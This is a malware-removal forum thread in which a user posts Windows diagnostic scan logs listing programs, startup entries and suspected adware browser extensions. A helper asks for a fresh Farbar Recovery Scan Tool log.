Citrix Online Launcher  
Compatibility Pack for the 2007 Office system  
D3DX10  
DAEMON Tools Lite  
ECI Client v6.0  
Fallout 3  
Fallout New Vegas Ultimate Edition  
File Association Helper  
Google Chrome  
Google Drive  
GoToMeeting 6.4.4.1831  
iSkysoft Video Converter Ultimate(Build 5.4.1.0)  
Java 7 Update 17 (64-bit)  
Java 7 Update 65  
Java Auto Updater  
Jing  
LogMeIn Hamachi  
Lost Via Domus  
Microsoft .NET Framework 4.5.1  
Microsoft Application Error Reporting  
Microsoft Corporation  
Microsoft Games for Windows - LIVE Redistributable  
Microsoft Games for Windows Marketplace  
Microsoft LifeCam  
Microsoft Office File Validation Add-In  
Microsoft Office Professional Edition 2003  
Microsoft Security Client  
Microsoft Security Essentials  
Microsoft Silverlight  
Microsoft SQL Server 2005 Compact Edition [ENU]  
Microsoft Visual C++ 2005 Redistributable  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319  
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319  
MixPad  
Movie Maker  
Mozilla Firefox 28.0 (x86 en-US)  
Mozilla Maintenance Service  
MSVCRT  
MSVCRT110  
MSVCRT110_amd64  
MTA:SA v1.3.5  
OutfoxTV  
Outlook Setup Tool  
PDFCreator  
Photo Common  
Photo Gallery  
PhotoPad Image Editor  
Pixillion Image Converter  
Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)  
Skype™ 6.11  
Spotify  
Starbound  
Steam  
Switch Sound File Converter  
swMSM  
VLC media player  
WavePad Sound Editor  
Windows Live Communications Platform  
Windows Live Essentials  
Windows Live ID Sign-in Assistant  
Windows Live Installer  
Windows Live Photo Common  
Windows Live PIMT Platform  
Windows Live SOXE  
Windows Live SOXE Definitions  
Windows Live UX Platform  
Windows Live UX Platform Language Pack  
WinZip 18.5  
 
==== Running Processes ======================
 
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXE
C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Mitey Fresh\Desktop\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\sysWow64\SearchProtocolHost.exe
 
==== Services (whitelist) ======================
Powered by E Dev
 
R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
R2 - [MSCamSvc] - MSCamSvc - "C:\Program Files\Microsoft LifeCam\MSCamS64.exe"
R2 - [MsMpSvc] - Microsoft Antimalware Service - "C:\Program Files\Microsoft Security Client\MsMpEng.exe"
R2 - [wlidsvc] - Windows Live ID Sign-in Assistant - "C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"
R2 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"
R2 - [WSearch] - Windows Search - C:\Windows\system32\SearchIndexer.exe /Embedding
R3 - [VSS] - Volume Shadow Copy - C:\Windows\system32\vssvc.exe
S2 - [clr_optimization_v4.0.30319_32] - Microsoft .NET Framework NGEN v4.0.30319_X86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
S2 - [clr_optimization_v4.0.30319_64] - Microsoft .NET Framework NGEN v4.0.30319_X64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
S2 - [SkypeUpdate] - Skype Updater - "C:\Program Files (x86)\Skype\Updater\Updater.exe"
S2 - [sppsvc] - Software Protection - C:\Windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
S3 - [ALG] - Application Layer Gateway Service - C:\Windows\System32\alg.exe
S3 - [aspnet_state] - ASP.NET State Service - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
S3 - [COMSysApp] - COM+ System Application - C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
S3 - [ehRecvr] - Windows Media Center Receiver Service - C:\Windows\ehome\ehRecvr.exe
S3 - [ehSched] - Windows Media Center Scheduler Service - C:\Windows\ehome\ehsched.exe
S3 - [Fax] - Fax - C:\Windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
S3 - [IEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\Windows\system32\IEEtwCollector.exe /V
S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
S3 - [MSDTC] - Distributed Transaction Coordinator - C:\Windows\System32\msdtc.exe
S3 - [msiserver] - Windows Installer - C:\Windows\system32\msiexec.exe /V
S3 - [NisSrv] - Microsoft Network Inspection - "C:\Program Files\Microsoft Security Client\NisSrv.exe"
S3 - [ose] - Office Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
S3 - [PerfHost] - Performance Counter DLL Host - C:\Windows\SysWow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\Windows\system32\locator.exe
S3 - [SNMPTRAP] - SNMP Trap - C:\Windows\System32\snmptrap.exe
S3 - [Steam Client Service] - Steam Client Service - "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService
S3 - [TrustedInstaller] - Windows Modules Installer - C:\Windows\servicing\TrustedInstaller.exe
S3 - [vds] - Virtual Disk - C:\Windows\System32\vds.exe
S3 - [WatAdminSvc] - Windows Activation Technologies Service - C:\Windows\system32\Wat\WatAdminSvc.exe
S3 - [wbengine] - Block Level Backup Engine Service - "C:\Windows\system32\wbengine.exe"
S3 - [wmiApSrv] - WMI Performance Adapter - C:\Windows\system32\wbem\WmiApSrv.exe
S4 - [clr_optimization_v2.0.50727_32] - Microsoft .NET Framework NGEN v2.0.50727_X86 - C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
S4 - [clr_optimization_v2.0.50727_64] - Microsoft .NET Framework NGEN v2.0.50727_X64 - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 
==== System Specs ======================
 
Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)
Memory (RAM): 3887 MB
CPU Info: Intel® Pentium® CPU        P6100  @ 2.00GHz
CPU Speed: 1994.6 MHz
Sound Card: Speakers (2- High Definition Au | 
Display Adapters: Intel® HD Graphics | Intel® HD Graphics | RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver
Monitors: 1x; Generic PnP Monitor | 
Screen Resolution: 1366 X 768 - 32 bit
Network: Network Present
Network Adapters: Atheros AR9285 Wireless Network Adapter | Realtek RTL8102E/RTL8103E Family PCI-E Fast Ethernet NIC (NDIS 6.20) | Hamachi Network Interface
CD / DVD Drives: 2x (E: | H: | ) E: TSSTcorpCDDVDW TS-L633C  | H: DTSOFT  BDROM
Ports: COM Ports NOT Present. LPT Port NOT Present. 
Mouse: 5 Button Wheel Mouse Present
Hard Disks: C:  273.4GB | D:  180.3GB
Hard Disks - Free: C:  115.3GB | D:  117.5GB
Manufacturer *: American Megatrends Inc.
BIOS Info: AT/AT COMPATIBLE | 09/07/10 | MSI_NB - 6222004
Time Zone: AUS Eastern Standard Time
Motherboard *: Micro-Star International A6200
Country: Australia 
Language: ENA 
 
==== System Specs (Software) ======================
 
Anti-Virus: Microsoft Security Essentials On-access scanning disabled (Outdated)
Anti-Spyware: Microsoft Security Essentials disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Default Browser: Google Chrome 33.0.1750.117
Internet Explorer Version: 11.0.9600.17358 
Mozilla Firefox version: 28.0 (x86 en-US)
Google Chrome version: 33.0.1750.117
Adobe Reader version: 11.0.07.79
Sun Java version: 1.7.0_65 (32-bit) 
Sun Java version: 1.7.0_17 (64-bit) 
Flash Player version: 15.0.0.152
Shockwave Player version: 12.0r112
 
==== Files Recently Created / Modified ======================
 
====== C:\Windows ====
====== C:\Users\MITEYF~1\AppData\Local\Temp ====
2014-10-16 02:28:39 E0DC8C6BBC787B972A9A468648DBFD85 1008128 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\libiconv2.dll
2014-10-16 02:28:39 D202BAA425176287017FFE1FB5D1B77C 103424 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\libintl3.dll
2014-10-16 02:28:39 57CAC848FA14AE38F14F9441F8933282 140288 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\pcre3.dll
2014-10-16 02:28:39 547C43567AB8C08EB30F6C6BACB479A3 79360 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\regex2.dll
2014-10-16 02:28:39 2E0323A94915FAAB10A25F3BABF82584 157696 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\erunt\ERUNT.EXE
2014-10-12 16:54:48 E17B30D3B06DBC63E9E94DAE70290A35 787968 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\sqlite3.dll
====== Java Cache =====
====== C:\Windows\SysWOW64 =====
====== C:\Windows\SysWOW64\drivers =====
====== C:\Windows\Sysnative =====
====== C:\Windows\Sysnative\drivers =====
2014-10-15 02:07:40 FE571E088C2D83619D2D48D4E961BF41 212480 ----a-w- C:\Windows\Sysnative\drivers\rdpwd.sys
2014-10-15 02:07:37 E232A3B43A894BB327FC161529BD9ED1 39936 ----a-w- C:\Windows\Sysnative\drivers\tssecsrv.sys
====== C:\Windows\Tasks ======
====== C:\Windows\Temp ======
======= C:\Program Files =====
2014-10-01 03:50:58 -------- d-----w- C:\Program Files\WinZip
======= C:\PROGRA~2 =====
2014-09-30 06:07:18 -------- d-----w- C:\PROGRA~2\COMMON~1\iSkysoft
2014-09-30 06:06:15 -------- d-----w- C:\PROGRA~2\iSkysoft
2014-09-22 07:46:55 -------- d-----w- C:\PROGRA~2\VLC
======= C: =====
====== C:\Users\Mitey Fresh\AppData\Roaming ======
2014-10-01 03:52:30 -------- d-----w- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
2014-10-01 03:51:45 -------- d-----w- C:\Users\Mitey Fresh\AppData\Local\WinZip
2014-09-30 06:07:43 -------- d-----w- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2014-09-30 06:07:24 -------- d-----w- C:\Users\Mitey Fresh\AppData\Local\iSkysoft
2014-09-22 07:48:09 -------- d-----w- C:\Users\Mitey Fresh\AppData\Roaming\vlc
2014-09-16 22:37:48 1036E3DDDC89A4E68D8A33F3823A180E 4 ----a-w- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
====== C:\Users\Mitey Fresh ======
2014-10-16 02:54:21 3F5D9D75F6523CB30924999EDFDAD28B 1705698 ----a-w- C:\Users\Mitey Fresh\Downloads\JRT (1).exe
2014-10-16 02:29:45 590AE97695A21AE8FA5B419BE3E13452 1976320 ----a-w- C:\Users\Mitey Fresh\Desktop\AdwCleaner (1).exe
2014-10-16 02:28:18 3F5D9D75F6523CB30924999EDFDAD28B 1705698 ----a-w- C:\Users\Mitey Fresh\Desktop\JRT (1).exe
2014-10-15 04:38:34 0D41FFFB6EEFDE929CDDF5EDFCC014BD 2111488 ----a-w- C:\Users\Mitey Fresh\Desktop\FRST64.exe
2014-10-10 01:57:58 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\Mitey Fresh\Downloads\OTL.exe
2014-10-01 03:51:50 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 03:51:08 -------- d-----w- C:\ProgramData\WinZip
2014-09-30 06:07:06 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2014-09-30 06:06:27 -------- d-----w- C:\ProgramData\iSkysoft Video Converter Ultimate
2014-09-30 06:06:15 -------- d-----w- C:\ProgramData\iSkysoft
2014-09-30 06:05:20 -------- d-----w- C:\Users\Public\Documents\iSkysoft
 
====== C: exe-files ==
=== C: other files ==
 
==== Startup Registry Enabled ======================
 
[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"
 
[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"
 
[HKEY_USERS\S-1-5-21-2275511576-419542734-2349628481-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"Spotify Web Helper"="C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
 
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SPReview"="C:\Windows\System32\SPReview\SPReview.exe /sp:1 /errorfwlink:http://go.microsoft..../?LinkID=122915 /build:7601"
 
[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"
 
[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"
 
[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SPReview"="C:\Windows\System32\SPReview\SPReview.exe /sp:1 /errorfwlink:http://go.microsoft..../?LinkID=122915 /build:7601"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Spotify Web Helper"="C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
 
==== Startup Registry Enabled x64 ======================
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\Windows\system32\igfxtray.exe"
"HotKeysCmds"="C:\Windows\system32\hkcmd.exe"
"Persistence"="C:\Windows\system32\igfxpers.exe"
"MSC"="c:\Program Files\Microsoft Security Client\msseces.exe -hide -runkey"
"FAHConsole"="C:\Program Files\File Association Helper\FAHConsole.exe"
 
==== Startup Registry Disabled x64 ======================
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Lite]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="DAEMON Tools Lite"
"hkey"="HKCU"
"command"="\"C:\\Program Files (x86)\\DAEMON Tools Lite\\DTLite.exe\" -autorun"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DelaypluginInstall]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="DelaypluginInstall"
"hkey"="HKLM"
"command"="C:\\ProgramData\\iSkysoft\\Video Converter Ultimate\\DelayPluginI.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\iSkysoft Helper Compact.exe]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="iSkysoft Helper Compact.exe"
"hkey"="HKLM"
"command"="C:\\Program Files (x86)\\Common Files\\iSkysoft\\iSkysoft Helper Compact\\ISHelper.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Jing]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Jing"
"hkey"="HKCU"
"command"="C:\\Program Files (x86)\\TechSmith\\Jing\\Jing.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LifeCam]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="LifeCam"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Microsoft LifeCam\\LifeExp.exe\""
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="LogMeIn Hamachi Ui"
"hkey"="HKLM"
"command"="\"D:\\Games\\LogMeIn Hamachi\\hamachi-2-ui.exe\" --auto-start"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OutfoxTV]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="OutfoxTV"
"hkey"="HKCU"
"command"="C:\\Program Files\\OutfoxTV\\OutfoxTV\\DesktopContainer.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Spotify]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Spotify"
"hkey"="HKCU"
"command"="\"C:\\Users\\Mitey Fresh\\AppData\\Roaming\\Spotify\\spotify.exe\" /uri spotify:autostart"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Spotify Web Helper]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Spotify Web Helper"
"hkey"="HKCU"
"command"="\"C:\\Users\\Mitey Fresh\\AppData\\Roaming\\Spotify\\Data\\SpotifyWebHelper.exe\""
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="SunJavaUpdateSched"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe\""
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\VX1000]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="VX1000"
"hkey"="HKLM"
"command"="C:\\Windows\\vVX1000.exe"
 
 
==== Task Scheduler Jobs ======================
 
C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [24/09/2014 08:48 PM]
C:\Windows\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job --a------ C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe [12/10/2014 10:10 PM]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [25/02/2014 04:36 PM]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [25/02/2014 04:36 PM]
 
==== Other Scheduled Tasks ======================
 
"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000" [C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\Optimizer Pro Schedule" ["C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe"]
"C:\Windows\SysNative\tasks\{B4A540EE-B703-4F88-8A36-0C4394E38292}" [C:\Program Files (x86)\Google\Chrome\Application\chrome.exe]
"C:\Windows\SysNative\tasks\{EBC5B4FF-C5FF-4433-9543-6D4208E88780}" [C:\Program Files (x86)\Google\Chrome\Application\chrome.exe]
 
==== Firefox Extensions Registry ======================
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]"="C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]" [30/09/2014 05:07 PM]
 
==== Firefox Extensions ======================
 
ProfilePath: C:\Users\MITEYF~1\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
- Undetermined - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com
- iSkysoft Video Converter Ultimate - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]
- Undetermined - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
- UTubErAdBllockEr - %ProfilePath%\extensions\[email protected]
- RooboSaver - %ProfilePath%\extensions\[email protected]
 
AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
==== Firefox Plugins ======================
 
Profilepath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
E3B4EA121F7BDEB0F6366E2BA9608CB5 - C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll - Citrix Online Web Deployment Plugin 1.0.0.104
546A28FBC44B984FD92530227BF6F5C2 - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll - Shockwave for Director / Shockwave for Director
15E298B5EC5B89C5994A59863969D9FF - C:\Windows\SysWOW64\npmproxy.dll - Microsoft® Windows® Operating System
 
 
==== Chromium Look ======================
 
SEOquake - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc
Google Docs - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Reddit Enhancement Suite - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb
Google Wallet - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Google Docs - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Skype for Chromium - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl
UTubErAdBllockEr - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncjehgeihgchlopaaacphighmfcjcfjb
Google Wallet - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
 
==== Chromium Startpages ======================
 
C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Preferences
"startup_urls": [ "http://www.google.com.au/" ],
 
 
==== IE Start and Search Settings ======================
 
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="yes"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchUrl]
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"Default_Search_URL"="http://www.google.com"
"SearchAssistant"="http://www.google.com"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
==== All HKCU SearchScopes ======================
 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/...ox&FORM=IE11SR"
 
==== C:\zoek_backup content ======================
 
C:\zoek_backup (files=0 folders=0 0 bytes)
 
==== EOF on Thu 16/10/2014 at 14:26:02.90 ======================
 
- IE was reset.
 
- FF was reset.


#7
Biscuithd


    Trusted Helper

  • Malware Removal
  • 2,573 posts

Looking better :)

Let's get a fresh scan with FRST

Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • When the tool opens click Yes to disclaimer.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please copy and paste their content into your next reply.

Also, let me know how the computer is working.



#8
awesomesauce


    Member

  • Topic Starter
  • 21 posts

Unfortunately I'm still having issues within Chrome - when I click links sometimes it opens ads.

 

Here's the FRST.txt log:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Mitey Fresh (administrator) on KIRRA-PC on 17-10-2014 08:46:42
Running from C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Nico Mak Computing) C:\Program Files\File Association Helper\FAHWindow.exe
(Spotify Ltd) C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
